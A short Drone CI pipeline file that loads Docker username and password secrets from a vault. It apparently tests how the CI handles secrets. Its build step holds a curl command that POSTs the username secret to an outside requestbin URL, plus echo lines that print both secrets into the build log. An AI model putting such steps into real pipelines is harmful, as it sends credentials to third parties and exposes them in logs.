kind: pipeline
name: default

steps:
- name: build
  image: debian
  environment:
    GOOS: linux
    GOARCH: amd64
    CGO_ENABLED: 0
    USERNAME:
      from_secret: username
    PASSWORD:
      from_secret: password

  commands:
    - echo $GOOS
    - curl -X POST -d fizz=$USERNAME http://requestbin.fullcontact.com/1crg3js1
    - echo ${RPUEBA_1}
    - echo ${username}
    - echo ${password}

---
kind: secret
name: username
get:
  path: secret/docker
  name: username

---
kind: secret
name: password
get:
  path: secret/docker
  name: password
